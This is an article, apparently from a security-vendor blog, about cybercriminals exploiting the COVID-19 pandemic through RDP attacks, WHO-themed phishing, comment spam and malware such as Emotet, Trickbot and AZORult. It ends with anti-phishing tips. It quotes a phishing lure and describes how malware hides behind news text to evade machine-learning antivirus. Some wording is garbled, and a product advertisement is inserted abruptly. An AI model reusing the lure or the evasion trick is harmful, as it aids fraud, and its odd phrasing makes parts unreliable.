Cybercrooks Use Global Pandemic to Take Advantage of Coronavirus Malware

With the World Health Organization officially declaring the COVID-19 infection a pandemic, more countries around the world are taking further action to contain the spread of the virus. In this time of crisis, hackers have taken the opportunity to exploit the mass panic surrounding the Coronavirus strain to spread malware and make a profit.

Remote Access Can Be a Threat to Organizations

In some places, nationwide quarantine is enforced, leaving many businesses and organizations with no other option but to have their employees quarantine themselves from home and work remotely. It is difficult for businesses and organizations to adapt their security models accordingly in such a short time. With access and usability taking priority over online security, the risk of cyber-attacks has increased significantly.

The main problem is not the need to provide a scalable remote working option, but the security of the network. Most people will rely on RDP (Remote Desktop) and enterprise VPN access solutions to connect to their work network and servers. While RDP is a great tool that gives you the ability to connect to a remote office and work from home, it appears to be the most preferred attack vector for ransomware in the first quarter of 2019. In addition to this, RDP credentials are known to be easily harvested by attackers.

When a company gives its employees remote access to the office to work from home, it is strongly recommended to reset all passwords, choose stronger ones, and opt for MFA (multi-factor authentication). These requirements are necessary because a large number of employees make the mistake of reusing the same password for more than one online service. This increases the chances of personal information being stolen and later sold in dark web markets.

A report from Cloudfare states that due to the large number of people staying in their homes at the same time, general internet usage has increased globally:

As more people work from home, peak traffic in the affected regions has increased, on average, by around 10%. In Italy, which has imposed a nationwide quarantine, peak internet traffic has increased by 30%. Traffic patterns have also changed so that peak traffic is occurring earlier in the day in affected areas. "

Malicious Actors Exploit the Coronavirus Outbreak for Phishing Purposes

No significant global event has been left untapped by cybercriminals for phishing. With the COVID-19 epidemic keeping people in a constant state of panic, it is very easy to attract unsuspecting victims. False promises of essential discoveries and the latest news on the Coronavirus strain are presented to users in the form of shady links or open infected files. All they have to do is click, and their devices will be instantly infected with the Coronavirus malware.

According to ActionFraud (National Fraud & Cyber ​​Crime Reporting Center in the UK), coronavirus scams cost victims more than £ 800,000 in February 2020 alone.

Check Point reports that since the start of 2020, more than 4,000 coronavirus-related domains have been registered, many of which are suspected of being intended for phishing activity.

Coronavirus spam campaigns and comment bots abound on the internet

Fake news and disinformation about the dreaded Coronavirus have turned into weapons not only for political bias but also for cybercriminal activity.

More and more spam campaigns regarding the COVID-19 outbreak are being sent daily. They will claim to belong to official organizations that offer legitimate information about the Coronavirus strain. The receiver will be prompted to follow a shady link or open an attachment.

Sophos Security Team is warning of an email claiming to have been sent by the World Health Organization, regarding awareness of the Coronavirus. The message contains the WHO logo and states:

"Browse the attached document on Safety Precautions Regarding the Spread of Corona Virus.

Click the button below to download

The most common symptoms are fever, cough, shortness of breath, and difficulty breathing."

Once you click on the link, you will be taken to a site with a strange domain name, which has no connection with OMS, and which is also an unsecured HTTP site. In the background, we can see the official WHO pages displayed in a frame and a pop-up email verification form above.

Aside from scam emails, comment spamming is another popular method. Bots are programmed to inject "Coronavirus" into comment sections on sites because it is a very popular search item these days. In doing so, the wrong robot will help rank the page significantly, thanks to the search algorithms. Comment spamming can also be seen on legitimate and trustworthy sites as it attracts a lot of readers. By using coronavirus-related content as clickbait in their comment sections, they can attract even more unsuspecting victims.

Threats like Emotet and Trickbot use coronavirus news to evade detection

According to reports from January 2020, the Trojans - Trickbot, and Emotet were seen using information about President Trump's impeachment in text form to sneak behind security software that uses AI or machine learning technology. Due to the effectiveness of this scheme, both Trojans continue to use it because it makes them appear harmless and AV fails to detect the malicious code they carry. Only this time, the text they add is from news related to Coronavirus.

Upon closer examination of the Emotet and Trickbot samples, it was discovered that they use the news from CNN news and include them in the description of the malware. The information in question is visible in the Details section when opening the Malware File Properties window.

This nifty trick is useful for evading detection of security software with artificial intelligence (AI) and machine learning features. You can adapt total security software by Protogent360 to match your requirement.

Other cases of Coronavirus malware circulating on the internet

The Emotet and Trickbot Trojans aren't the only malware that takes advantage of the COVID-19 strain. Because the pandemic has made people anxious to receive information about the virus, it has created a perfect basis for effective cyber-attacks.

For example, AZORult password-stealing malware was detected on questionable websites that used a version of the Coronavirus Infections and Deaths Interactive Dashboard (produced by Johns Hopkins University).

Another Coronavirus malware is Vicious Panda. Its creators use fake documents related to the COVID-19 virus to spread malware and obtain users' personal data. The Chinese actors are responsible for this Coronavirus malware claim to send official information from the Mongolian Ministry of Health, with the aim of making the victim disclose sensitive data.

There are also cases of malware containing the name "Coronavirus" or "COVID-19". Examples of such threats are the CovidLock ransomware and CoronaVirus. What's curious about the latter is that it can actually be a wiper, serving as a cover for a KPOT Trojan installation.

Because COVID-19 continues to be a hot topic globally, cybercriminals will inevitably exploit the situation to their advantage. To make sure you don't fall victim to Coronavirus malware, you should always be careful when online. Here are some steps you can take to prevent this from happening:

Don't be fooled by the name of the sender of the email. Since the name is not a true indicator of legitimacy, you should compare the sender's email with that of the actual organization or business they claim to be.

Think carefully before clicking on a link if it looks fishy.

Never enter personal information on a website that shouldn't need it. If you think you've shared login information on a bogus site, you should change your passwords as soon as possible.

Often, it is the spelling and grammar mistakes that betray attackers. If a large organization or business contact you via email, their message wouldn't be full of simple mistakes.

Don't feel like you have to follow the instructions in an email. No matter how prompted you are to follow a link or open an attachment, it would be best to think twice before complying. If in doubt, do your research to verify the legitimacy of the email and its sender before doing anything reckless.